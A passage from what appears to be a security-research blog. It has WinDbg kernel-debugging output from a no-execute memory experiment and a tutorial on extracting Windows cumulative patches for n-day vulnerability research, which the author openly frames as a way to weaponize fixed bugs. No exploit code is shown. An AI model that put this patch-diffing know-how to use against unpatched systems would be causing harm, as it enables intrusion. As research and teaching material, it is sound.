1: kd> !analyze -v
The debuggee is ready to run
1: kd> g
Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff803`753fd0b0 cc              int     3
1: kd> !analyze -v
Connected to Windows 10 19041 x64 target at (Fri Nov 27 22:40:28.176 2020 (UTC - 5:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
.............................................................
Loading User Symbols
................................................................
................................................................
................................................................
................................................................

Loading unloaded module list
.............................

************* Symbol Loading Error Summary **************
Module name            Error
SharedUserData         No error - symbol load deferred

You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory.  The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 00007ff9abfd216f, Virtual address for the attempted execute.
Arg2: 030000000f670025, PTE contents.
Arg3: ffff9884ab7f0940, (reserved)
Arg4: 0000000080000005, (reserved)

KVAS Disabled, SMEP Disabled

Expected result: successful execution in a user mode page

0: kd> !process 0 0 explorer.exe
PROCESS ffff840ec792c340
    SessionId: 1  Cid: 1050    Peb: 00380000  ParentCid: 1024
    DirBase: b2f4f000  ObjectTable: ffff948cdda96d40  HandleCount: 1952.
    Image: explorer.exe

0: kd> .process /i /p ffff840ec792c340
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff806`743fd0b0 cc              int     3
1: kd> .reload /user
Loading User Symbols
................................................................
................................................................
................................................................
..............................................................
1: kd> r rip=kernel32+216e
1: kd> u kernel32+216e
KERNEL32!SortGetSortKey+0xede:
00007ff8`b5a0216e cc              int     3
00007ff8`b5a0216f fc              cld
00007ff8`b5a02170 ff              ???
00007ff8`b5a02171 ff418b          inc     dword ptr [rcx-75h]
00007ff8`b5a02174 c24d8d          ret     8D4Dh
00007ff8`b5a02177 3c44            cmp     al,44h
00007ff8`b5a02179 0f1f8000000000  nop     dword ptr [rax]
00007ff8`b5a02180 418d0413        lea     eax,[r11+rdx]
1: kd> u kernel32+216e L1
KERNEL32!SortGetSortKey+0xede:
00007ff8`b5a0216e cc              int     3
1: kd> r cr4=@@C++(@cr4 & ~(1 p
KERNEL32!SortGetSortKey+0xedf:
00007ff8`b5a0216f fc              cld
1: kd> p
00007ff8`b5a02170 ff              ???

No crash!!

Results

As expected, all tests but the last caused a crash immediately. Interestingly, the CPU executed the breakpoint instruction and crashed on the next instruction on every test that crashed. Instruction caching? Or just how the CPU is designed. Very interesting!

noexecute
:(

Wrap up

I hope you've learned a thing or two from this. I've been wanting to do this investigation for a while, just to nail down the implementation details here. If you have questions feel free to reach out on Twitter @jgeigerm. For now and as always ~~h a v e f u n i n s i d e~~.

Bonus: WinDbg Bug

There's a bug in the dt command where it sign extends bit 31 on 64-bit values making it impossible to do dt -p on some values:

1: kd> dt -p nt!_MMPTE_HARDWARE 0x0000000bd6de7f8
   +0x000 Valid            : ??
   +0x000 Dirty1           : ??
   +0x000 Owner            : ??
   +0x000 WriteThrough     : ??
   +0x000 CacheDisable     : ??
   +0x000 Accessed         : ??
   +0x000 Dirty            : ??
   +0x000 LargePage        : ??
   +0x000 Global           : ??
   +0x000 CopyOnWrite      : ??
   +0x000 Unused           : ??
   +0x000 Write            : ??
   +0x000 PageFrameNumber  : ??
   +0x000 ReservedForHardware : ??
   +0x000 ReservedForSoftware : ??
   +0x000 WsleAge          : ??
   +0x000 WsleProtection   : ??
   +0x000 NoExecute        : ??
Memory read error ffffffffbd6de7f8

Totally bogus! The solution I found was to wrap the value in the MASM or C++ interpreter:

1: kd> dt -p nt!_MMPTE_HARDWARE @@C++(0x00000000bd6de7f8)
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y1
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
   +0x000 PageFrameNumber  : 0y000000000000000000111111100011101010 (0x3f8ea)
   +0x000 ReservedForHardware : 0y0000
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y1010
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y1
1: kd> dt -p nt!_MMPTE_HARDWARE @@(0x00000000bd6de7f8)
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y1
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
   +0x000 PageFrameNumber  : 0y000000000000000000111111100011101010 (0x3f8ea)
   +0x000 ReservedForHardware : 0y0000
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y1010
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y1

Other resources I didn't find a place for but still wanted to include

Extracting and Diffing Windows Patches in 2020

It's been a while since I've posted anything here! After all, what are personal blogs for but ignoring for years at a time ;)
Anyhow, I've been running through this demo when teaching SANS SEC760 and I thought I'd write it up so that researchers can come back to it later when they need it. It's also useful to document all of this stuff in one place, since the information about it seems scattered throughout the internet, as many Windows topics are.

So why should you care about extracting and analyzing Windows patches? Doesn't the patch mean the bugs being fixed are now useless?

[[more]]

To start thinking about how to answer those questions, think about how long it takes for even a well running organization with proper patch management to roll out patches to devices. If you, the security researcher, can weaponize a bug within a few weeks of a patch being released, then you may be able to sell it or use it in engagements. Finding bugs is hard, but n-day research tells you pretty much exactly where the bugs are! This is good news. Looking at how patches are implemented and where bugs are fixed can also be useful in discovering 0-days. Over the years, Microsoft has had to fix the same (or very similar) bugs in multiple places. A classic example is the old MS07-017 animated cursor bug that was actually a repeat of the same exact bug from two years prior (MS05-002), just one function cross-reference away. Additionally, Microsoft may not fix the vulnerability at all, or the fix may not be complete, as was the case with the Print Spooler bugs that were found this year, dubbed PrintDemon by Ionescu and Shafir. The original CVE is CVE-2020-1048 and is credited to Peleg Hadar and Tomer Bar over at SafeBreach Labs. After the fix, Ionescu was credited with CVE-2020-1337 which still allowed the creation of malicious ports through a Time Of Check Time Of Use (TOC/TOU) bug, slightly detailed here. All of this just to say: yes it is worth looking at patches. Looking at patches can also help you find new features that have yet to be thouroughly torn apart by researchers, which are prime targets for vulnerability research.

Obtaining Patches and the Windows Patch Packaging Formats

To be able to rip apart a patch you'll first need to understand what format patches come in and how to get them. You might actually be vaguely familiar with the file formats used to package a patch: .MSU (Microsoft Standalone Update) and .CAB (Cabinet). All patches are distributed as part of Windows Update on your device, but you can also still download standalone patches from the Microsoft Update Catolog. For this post I'm going to be tearing apart patches for Windows 10 1903 x64. A long time ago Microsoft established the second Tuesday of every month as Patch Tuesday, so that patch managers could always know when to expect fixes. For the most part they stick to releasing updates on Patch Tuesday, with the occasional emergency patch for very severe bugs. Microsoft used to provide sequential update packages that had to be installed in order. These days, updates are provided as cumulative, meaning that all of the required updates from the base version (.1) are included in the package. This can make for some pretty large updates! To make things a bit more complicated, many of the updates are distributed as deltas, which we will talk about in depth later in this post.

Effectively Browsing the Microsoft Update Catalog

Luckily, the Microsoft Update Catalog has a pretty good search feature. The most effective way to search for the update you want is to search in the following format:

YYYY-MM release-number (x86|x64|ARM64) cumulative

So for example, if I am looking for the July 2020 patch set for Windows 10 1903 x64 I would search 2020-07 1903 x64 cumulative and one of the top hits should be the result I'm looking for.

Searching for an update
Relevant results are easy to get with the right search!

As you can see, results were returned for a few different release numbers (1903, 1909, and 2004) and both Windows 10 and Windows Server. The keen observer should note that the Windows Server and Windows 10 updates are the exact same size. In fact, if you click download, both links direct to the same place. Additionally, updates for 1903 and 1909 are also the same. The latter case reason is explained on the OS build page:

Windows 10, versions 1903 and 1909 share a common core operating system and an identical set of system files. As a result, the new features in Windows 10, version 1909 were included in the recent monthly quality update for Windows 10, version 1903 (released October 8, 2019), but are currently in a dormant state. These new features will remain dormant until they are turned on using an enablement package, which is a small, quick-to-install β€œmaster switch” that simply activates the Windows 10, version 1909 features.

Dynamic and Servicing Stack Updates

Microsoft also distributes a few other kinds of updates via the Microsoft Update Catalog. If you leave off the word cumulative from the search above, then you get some more results, including Dynamic and Servicing Stack updates that are considerably smaller than the cumulative updates.

Update variations
Different Kinds of Updates

According to Microsoft documentation servicing stack updates are updates to the Windows Update process itself. Servicing stack updates are packaged like cumulative updates and only include components related to Windows Update.

Microsoft documentation saves the day again for dynamic updates, which apparently can also update Windows Update components, as well as setup components like installation media, Windows Recovery Environment (WinRE), and some drivers. Dynamic updates are packaged slightly differently than cumulative and servicing stack updates; they are downloadable as a single CAB file and have various language packs and other setup components.

Extracting a Patch

Patches are packed tightly into an MSU file, which can contain tens of thousands of files, only some of which matter to us as security researchers. I wanted to walk through manual extraction first and then provide an update to an existing script (PatchExtract.ps1) to automatically extract and sort a given patch.

Manual Extraction

To get started, you'll need to download a cumulative update MSU file from the update catalog. For this example I'm using the Windows 10 1903 x64 August 2020 cumulative update package. I usually make a few folders before I start: I name the top-level folder with the patch year and month and then create two sub-folders called patch and ext. The actual patch files inside of the nested CAB file will go in the patch folder, and the contents of the extracted MSU will go in the ext folder.

mkdir 2020-08
mv ".\windows10.0-kb4565351-x64_e4f46f54ab78b4dd2dcef193ed573737661e5a10.msu" .\2020-08\
cd .\2020-08\
mkdir ext
mkdir patch

Next, I'm going to expand the MSU using the expand.exe command. The arguments for expand can be detailed using the /? flag. For our purposes we will be extracting every file so we will use -F:*. If you only want certain kinds of files (CABs, DLLs, EXEs, etc.) then you can use the -F flag make it so. The next two arguments are the MSU to extract and then the destination folder for the expanded files.

expand.exe -F:* ".\windows10.0-kb4565351-x64_e4f46f54ab78b4dd2dcef193ed573737661e5a10.msu" .\ext\

Finally, I'm going to extract the patch files from the PSFX cab file by using the expand command again, this time expanding to the patch directory.

expand.exe -F:* ".\ext\Windows10.0-KB4565351-x64_PSFX.cab" .\patch\ | Out-Null

At this point I recommend walking away, starting a load of laundry, getting a sandwich, and petting the cat, because this part takes a while (10-20mins). The Out-Null is optional, I only use it because I don't care for it printing every file it is about to extract. This particular extraction took about 15 minutes (via Measure-Command) and resulted in a total of 78898 files and folders under the patch folder!

If you're following along at home:
Once the extraction is complete, give yourself a high-five, and then take it back, because unfortunately that was the easy part!

Next, you'll have to make sense of the extracted files and find the patched files you are looking for.

Making Sense of the Extracted Files

To find what you are looking for it helps to know the structure of the patch and the types of files you will encounter.

To begin to understand these details take a look at this hirearchical view of a patch starting with the MSU (output abbreviated to save space):

windows10.0-kb4565351-x64_e4f46f54ab78b4dd2dcef193ed573737661e5a10.msu
β”œβ”€β”€ WSUSSCAN.cab
β”œβ”€β”€ Windows10.0-KB4565351-x64-pkgProperties_PSFX.txt
β”œβ”€β”€ Windows10.0-KB4565351-x64_PSFX.xml
└── Windows10.0-KB4565351-x64_PSFX.cab
    β”œβ”€β”€ amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.18362.1016_none_e013babca5ee7b0b
    β”‚   └── gdiplus.dll
    β”œβ”€β”€ amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.1016_none_79ea293316ee3bad
    β”‚   β”œβ”€β”€ f
    β”‚   β”‚   └── ntoskrnl.exe
    β”‚   └── r
    β”‚       └── ntoskrnl.exe
    β”œβ”€β”€ msil_microsoft.hyperv.powershell.cmdlets_31bf3856ad364e35_10.0.18362.959_none_a7668eee2055cacf
    β”‚   β”œβ”€β”€ f
    β”‚   β”‚   └── microsoft.hyperv.powershell.cmdlets.dll
    β”‚   └── r
    β”‚       └── microsoft.hyperv.powershell.cmdlets.dll
    β”œβ”€β”€ wow64_microsoft-windows-p..ting-spooler-client_31bf3856ad364e35_10.0.18362.693_none_f3229700ded2ae02
    β”‚   β”œβ”€β”€ f
    β”‚   β”‚   └── winspool.drv
    β”‚   └── r
    β”‚       └── winspool.drv
    β”œβ”€β”€ x86_microsoft-windows-win32calc.resources_31bf3856ad364e35_10.0.18362.387_ar-sa_38566bf3d86fbe5c
    β”‚   β”œβ”€β”€ f
    β”‚   β”‚   └── win32calc.exe.mui
    β”‚   └── r
    β”‚       └── win32calc.exe.mui
    β”œβ”€β”€ amd64_windows-shield-provider_31bf3856ad364e35_10.0.18362.900_none_fbf40d7d5ed8b490
    β”‚   β”œβ”€β”€ f
    β”‚   β”‚   β”œβ”€β”€ featuretoastbulldogimg.png
    β”‚   β”‚   β”œβ”€β”€ securityhealthagent.dll
    β”‚   β”‚   β”œβ”€β”€ securityhealthhost.exe
    β”‚   β”‚   β”œβ”€β”€ securityhealthproxystub.dll
    β”‚   β”‚   β”œβ”€β”€ securityhealthservice.exe
    β”‚   β”‚   β”œβ”€β”€ windowsdefendersecuritycenter.admx
    β”‚   β”‚   └── windowssecurityicon.png
    β”‚   β”œβ”€β”€ n
    β”‚   β”‚   └── featuretoastdlpimg.png
    β”‚   └── r
    β”‚       β”œβ”€β”€ featuretoastbulldogimg.png
    β”‚       β”œβ”€β”€ securityhealthagent.dll
    β”‚       β”œβ”€β”€ securityhealthhost.exe
    β”‚       β”œβ”€β”€ securityhealthproxystub.dll
    β”‚       β”œβ”€β”€ securityhealthservice.exe
    β”‚       β”œβ”€β”€ windowsdefendersecuritycenter.admx
    β”‚       └── windowssecurityicon.png
    β”œβ”€β”€ microsoft-windows-kernel-feature-package~31bf3856ad364e35~amd64~~10.0.18362.1016.cat
    β”œβ”€β”€ microsoft-windows-kernel-feature-package~31bf3856ad364e35~amd64~~10.0.18362.1016.mum
    β”œβ”€β”€ amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.1016_none_79ea293316ee3bad.manifest
    β”œβ”€β”€ amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.18362.1016_none_e013babca5ee7b0b.manifest
    β”œβ”€β”€ msil_microsoft.hyperv.powershell.cmdlets_31bf3856ad364e35_10.0.18362.959_none_a7668eee2055cacf.manifest
    β”œβ”€β”€ wow64_microsoft-windows-p..ting-spooler-client_31bf3856ad364e35_10.0.18362.693_none_f3229700ded2ae02.manifest
    β”œβ”€β”€ amd64_windows-shield-provider_31bf3856ad364e35_10.0.18362.900_none_fbf40d7d5ed8b490.manifest
    └── x86_microsoft-windows-win32calc.resources_31bf3856ad364e35_10.0.18362.387_ar-sa_38566bf3d86fbe5c.manifest

As you can see above there are a number of different file formats and folder types:

  • Folder Types
    • Platforms - all folders in the upate will be prefixed with one of these
      • amd64 - 64-bit x86
      • x86 - 32-bit x86
      • wow64 - Windows (32-bit) On Windows 64-bit
      • msil - Microsoft Intermediate Language (.NET)
    • Differential Folders
      • n - Null differentials
      • r - Reverse differentials
      • f - Forward differentials
  • File Types
    • manifest - (nearly) 1-1 paired with a platform folder, these are Windows Side-by-Side (WinSxS) manifests
    • cat - security catalog
    • mum - 1-1 paired with a .cat file and conatins metadata about the part of the update package that the security catalog applies to

The platform folders and manifests actually have to do with WinSxS, as the system may store multiple versions of a binary in the C:\Windows\WinSxS folder, along with differential files. Take note of the fact that there are more than just EXEs and DLLs in these folders. There are PNG and MUI files as well. Any kind of file can be updated via Windows Update and WinSxS. Some folder names have been truncated; it seems that the maximum folder name length is 100 characters, with extra characters in the middle being replaced with ...

For purposes of this post, I'm going to leave .mum and .cat files alone, since they are essentially just metadata and signature validation information.

WinSxS Manifests

The .manifest files in the patch describe how the patch is to be applied, the files that are part of the patch, the expected result of the patch in the form of file hashes, permissions of the resulting files, registry keys to set, and more. They define the effects that happen to the system other than replacing the file that is being updated.

Here is an example manifest for the Windows-Gaming-XboxLive-Storage-Service-Component, whatever that is.

amd64_windows-gaming-xbox..e-service-component_31bf3856ad364e35_10.0.18362.836_none_a949879e457dbcd4.manifest
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0" copyright="Copyright (c) Microsoft Corporation. All Rights Reserved.">
  <assemblyIdentity name="Windows-Gaming-XboxLive-Storage-Service-Component" version="10.0.18362.836" processorArchitecture="amd64" language="neutral" buildType="release" publicKeyToken="31bf3856ad364e35" versionScope="nonSxS" />
  <dependency discoverable="no" resourceType="resources">
    <dependentAssembly>
      <assemblyIdentity name="Windows-Gaming-XboxLive-Storage-Service-Component.Resources" version="10.0.18362.836" processorArchitecture="amd64" language="*" buildType="release" publicKeyToken="31bf3856ad364e35" />
    </dependentAssembly>
  </dependency>
  <file name="XblGameSave.dll" destinationPath="$(runtime.system32)\" sourceName="XblGameSave.dll" importPath="$(build.nttree)\" sourcePath=".\">
    <securityDescriptor name="WRP_FILE_DEFAULT_SDDL" />
    <asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">
      <dsig:Transforms>
        <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
      </dsig:Transforms>
      <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
      <dsig:DigestValue>VjbzeELS2YXIwIhHo5f2hQm+pWTzHY8wo7dFxzfkbtA=</dsig:DigestValue>
    </asmv2:hash>
  </file>
  <file name="XblGameSaveTask.exe" destinationPath="$(runtime.system32)\" sourceName="" importPath="$(build.nttree)\">
    <securityDescriptor name="WRP_FILE_DEFAULT_SDDL" />
    <asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">
      <dsig:Transforms>
        <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
      </dsig:Transforms>
      <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
      <dsig:DigestValue>Ez9Rg7QMg26whoQcakH4i15oeH1NOZgbybxRdPMoi8Q=</dsig:DigestValue>
    </asmv2:hash>
  </file>
  <memberships>
    <categoryMembership>
      <id name="Microsoft.Windows.Categories.Services" version="10.0.18362.836" publicKeyToken="31bf3856ad364e35" typeName="Service" />
      <categoryInstance subcategory="XblGameSave">
        <serviceData name="XblGameSave" displayName="@%systemroot%\system32\XblGameSave.dll,-100" errorControl="normal" start="demand" type="win32ShareProcess" description="@%systemroot%\system32\XblGameSave.dll,-101" dependOnService="UserManager,XblAuthManager" imagePath="%SystemRoot%\system32\svchost.exe -k netsvcs -p" objectName="LocalSystem">
          <failureActions resetPeriod="86400">
            <actions>
              <action delay="10000" type="restartService" />
              <action delay="10000" type="restartService" />
              <action delay="10000" type="restartService" />
              <action delay="0" type="none" />
            </actions>
          </failureActions>
          <serviceTrigger action="start" subtype="RPC_INTERFACE_EVENT" type="NetworkEndpointEvent">
            <triggerData type="string" value="F6C98708-C7B8-4919-887C-2CE66E78B9A0" />
          </serviceTrigger>
        </serviceData>
      </categoryInstance>
    </categoryMembership>
    <categoryMembership>
      <id name="Microsoft.Windows.Categories" version="1.0.0.0" publicKeyToken="365143bb27e7ac8b" typeName="BootRecovery" />
    </categoryMembership>
    <categoryMembership>
      <id name="Microsoft.Windows.Categories" version="1.0.0.0" publicKeyToken="365143bb27e7ac8b" typeName="SvcHost" />
      <categoryInstance subcategory="netsvcs">
        <serviceGroup position="last" serviceName="XblGameSave" />
      </categoryInstance>
    </categoryMembership>
  </memberships>
  <taskScheduler>
    <Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
      <RegistrationInfo>
        <Author>Microsoft</Author>
        <Description>XblGameSave Standby Task</Description>
        <URI>\Microsoft\XblGameSave\XblGameSaveTask</URI>
      </RegistrationInfo>
      <Principals>
        <Principal id="LocalSystem">
          <UserId>S-1-5-18</UserId>
        </Principal>
      </Principals>
      <Triggers>
        <IdleTrigger id="XblGameSave Check on CS Entry">
          <Enabled>false</Enabled>
        </IdleTrigger>
      </Triggers>
      <Settings>
        <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
        <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
        <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
        <AllowHardTerminate>true</AllowHardTerminate>
        <StartWhenAvailable>false</StartWhenAvailable>
        <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>
        <AllowStartOnDemand>true</AllowStartOnDemand>
        <Enabled>true</Enabled>
        <Hidden>false</Hidden>
        <RunOnlyIfIdle>true</RunOnlyIfIdle>
        <WakeToRun>false</WakeToRun>
        <ExecutionTimeLimit>PT2H</ExecutionTimeLimit>
        <Priority>7</Priority>
      </Settings>
      <Actions Context="LocalSystem">
        <Exec>
          <Command>%windir%\System32\XblGameSaveTask.exe</Command>
          <Arguments>standby</Arguments>
        </Exec>
      </Actions>
    </Task>
  </taskScheduler>
  <registryKeys>
    <registryKey keyName="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Ubpm">
      <registryValue name="CriticalTask_XblGameSaveTask" valueType="REG_SZ" value="NT TASK\Microsoft\XblGameSave\XblGameSaveTask" />
      <registryValue name="CriticalTask_XblGameSaveTaskLogon" valueType="REG_SZ" value="NT TASK\Microsoft\XblGameSave\XblGameSaveTaskLogon" />
      <securityDescriptor name="WRP_REGKEY_DEFAULT_SDDL" />
    </registryKey>
    <registryKey keyName="HKEY_CLASSES_ROOT\AppId\{C5D3C0E1-DC41-4F83-8BA8-CC0D46BCCDE3}">
      <registryValue name="" valueType="REG_SZ" value="Xbox Live Game Saves" />
      <registryValue name="LocalService" valueType="REG_SZ" value="XblGameSave" />
      <registryValue name="AccessPermission" valueType="REG_BINARY" value="010014806400000070000000140000003000000002001c000100000011001400040000000101000000000010001000000200340002000000000018001f000000010200000000000f0200000001000000000014001f00000001010000000000010000000001010000000000050a00000001020000000000052000000021020000" />
      <registryValue name="LaunchPermission" valueType="REG_BINARY" value="010014806400000070000000140000003000000002001c000100000011001400040000000101000000000010001000000200340002000000000018001f000000010200000000000f0200000001000000000014001f00000001010000000000010000000001010000000000050a00000001020000000000052000000021020000" />
      <securityDescriptor name="WRP_REGKEY_DEFAULT_SDDL" />
    </registryKey>
    <registryKey keyName="HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\XblGameSave\Parameters">
      <registryValue name="ServiceDll" valueType="REG_EXPAND_SZ" value="%SystemRoot%\System32\XblGameSave.dll" />
      <registryValue name="ServiceDllUnloadOnStop" valueType="REG_DWORD" value="0x00000001" />
      <registryValue name="ServiceIdleTimeout" valueType="REG_DWORD" value="0x00000258" />
    </registryKey>
    <registryKey keyName="HKEY_CLASSES_ROOT\CLSID\{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}\">
      <registryValue name="AppId" valueType="REG_SZ" value="{C5D3C0E1-DC41-4F83-8BA8-CC0D46BCCDE3}" />
      <securityDescriptor name="WRP_REGKEY_DEFAULT_SDDL" />
    </registryKey>
    <registryKey keyName="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\AllowedCOMCLSIDs\{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}\" />
    <registryKey keyName="HKEY_CLASSES_ROOT\CLSID\{5B3E6773-3A99-4A3D-8096-7765DD11785C}\">
      <registryValue name="AppId" valueType="REG_SZ" value="{C5D3C0E1-DC41-4F83-8BA8-CC0D46BCCDE3}" />
      <securityDescriptor name="WRP_REGKEY_DEFAULT_SDDL" />
    </registryKey>
    <registryKey keyName="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\AllowedCOMCLSIDs\{5B3E6773-3A99-4A3D-8096-7765DD11785C}\" />
  </registryKeys>
  <localization>
    <resources culture="en-US">
      <stringTable>
        <string id="displayName" value="XblGameSave" />
        <string id="description" value="XblGameSave service" />
      </stringTable>
    </resources>
  </localization>
  <trustInfo>
    <security>
      <accessControl>
        <securityDescriptorDefinitions>
          <securityDescriptorDefinition name="WRP_REGKEY_DEFAULT_SDDL" sddl="O:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464G:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464D:P(A;CI;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;CI;GR;;;SY)(A;CI;GR;;;BA)(A;CI;GR;;;BU)(A;CI;GR;;;S-1-15-2-1)(A;CI;GR;;;S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)" operationHint="replace" />
          <securityDescriptorDefinition name="WRP_FILE_DEFAULT_SDDL" sddl="O:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464G:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464D:P(A;;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;;GRGX;;;BA)(A;;GRGX;;;SY)(A;;GRGX;;;BU)(A;;GRGX;;;S-1-15-2-1)(A;;GRGX;;;S-1-15-2-2)S:(AU;FASA;0x000D0116;;;WD)" operationHint="replace" />
        </securityDescriptorDefinitions>
      </accessControl>
    </security>
  </trustInfo>
</assembly>

Notice all of the different fields. There are fields to modify registry keys, change file permissions, the files to patch and their resulting hashes, services to modify or change the state of, scheduled tasks to add or change, and more!

If you look inside the corresponding platform folder that this manifest describes, you will find the files that it is referring to, either as full files or (in this case) differentials:

PS > ls -Recurse amd64_windows-gaming-xbox..e-service-component_31bf3856ad364e35_10.0.18362.836_none_a949879e457dbcd4


    Directory: C:\Users\wumb0\Desktop\patches\2020-08\patch\amd64_windows-gaming-xbox..e-service-component_31bf3856ad36
    4e35_10.0.18362.836_none_a949879e457dbcd4


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         8/23/2020   6:50 PM                f
d-----         8/23/2020   6:50 PM                r


    Directory: C:\Users\wumb0\Desktop\patches\2020-08\patch\amd64_windows-gaming-xbox..e-service-component_31bf3856ad36
    4e35_10.0.18362.836_none_a949879e457dbcd4\f


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          8/6/2020   5:10 AM          35111 xblgamesave.dll
-a----          8/6/2020   5:10 AM            237 xblgamesavetask.exe


    Directory: C:\Users\wumb0\Desktop\patches\2020-08\patch\amd64_windows-gaming-xbox..e-service-component_31bf3856ad36
    4e35_10.0.18362.836_none_a949879e457dbcd4\r


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          8/6/2020   5:10 AM          35200 xblgamesave.dll
-a----          8/6/2020   5:10 AM            237 xblgamesavetask.exe

Automating Patch Extraction

Now that you know a bit about the structure of a patch and how to extract the files from one, it's time to introduce some automation into the mix. Greg Linares (@laughing_mantis) is the author of Patch Extract, a tool to automagically extract and organize a Microsoft Patch. He also created a tool called Patch Clean, but I am unsure if it still works with modern patches, so use at your own peril! I have slightly modified PatchExtract to fix some powershell issues and to quiet the output of the script. Be aware that it uses IEX on a user input string now, so be careful :).

PatchExtract.ps1

To use, specify the path to the PATCH and the output PATH for the resulting files. PatchClean will extract the MSU, find the PSFX CAB, extract its contents, and sort the extracted patch into various folders:

PS > ls X:\Patches\x64\1903\2019\9


    Directory: X:\Patches\x64\1903\2019\9


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
da----         11/9/2019   6:30 PM                JUNK
da----         11/9/2019   6:30 PM                MSIL
da----         11/9/2019   6:32 PM                PATCH
da----         11/9/2019   6:31 PM                WOW64
da----         11/9/2019   7:06 PM                x64
da----         11/9/2019   6:31 PM                x86
-a----          9/8/2019  12:28 PM            517 Windows10.0-KB4515384-x64-pkgProperties_PSFX.txt

The MSIL, WOW64, x86, and x64 folders will contain all of the different platform folders with their prefixes removed. The PATCH folder will contain the patch MSU and it's contents, except for the patch PSFX metadata text file, which is left in the root of the top level folder. Finally the JUNK folder is populated with the .manifest files and also the .mum and .cat files we don't really care about. Use this tool to speed up the patch extraction process!

Handling Extracted Patches

A word of caution when extracting patches: always do it on your local machine, zip up the results, and then transfer to another machine for storage. An uncompressed, extracted patch is about 1.5 GB and a compressed, extracted patch is about 1 GB. This can fill up your disk space fast! Since there are tens of thousands of files in each patch, a transfer of the uncompressed directory structure will take a very long time. If you need to search through a compressed patch you can just use unzip -l to list the contents and then extract only the files you need.

Types of Patch Files

Full Files

Platform folders without an n, f, or r directory in them contain the full file to be installed. The patch process is as simple as copying the file(s) in that folder to the place(s) specified in the corresponding .manifest file.

How would you get ahold of another copy of this file to diff against? This can be difficult, but you may be able to look in previous patches for a different version. It turns out that differentials are actually the more convenient case here!

Patch Deltas

When a platform folder has an n, f, or r directory in it the patch is a delta that is either applied to the existing file (r/f) or to an empty buffer to create a new file (n). Microsoft published a whitepaper on differentials at the beginning of this year (2020). It contains some details about the technology, but not enough to be useful in manually applying the deltas, other than knowing what f, r, and n mean.

Types of Deltas

As mentioned previously, there are three types of deltas:

  • Forward differentials (f) - brings the base binary (.1) up to that particular patch level
  • Reverse differentials (r) - reverts the applied patch back to the base binary (.1)
  • Null differentials (n) - a completely new file, just compressed; apply to an empty buffer to get the full file

You will always see r and f folders together inside of a patch because you need to be able to revert the patch later on to apply a newer update.

Delta APIs

